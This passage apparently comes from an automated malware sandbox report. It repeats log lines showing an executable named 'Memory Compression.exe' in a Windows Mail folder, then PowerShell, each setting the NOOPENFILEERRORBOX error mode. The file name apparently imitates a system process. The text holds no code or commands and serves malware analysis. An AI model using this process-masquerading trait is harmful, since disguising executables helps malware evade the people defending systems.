                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
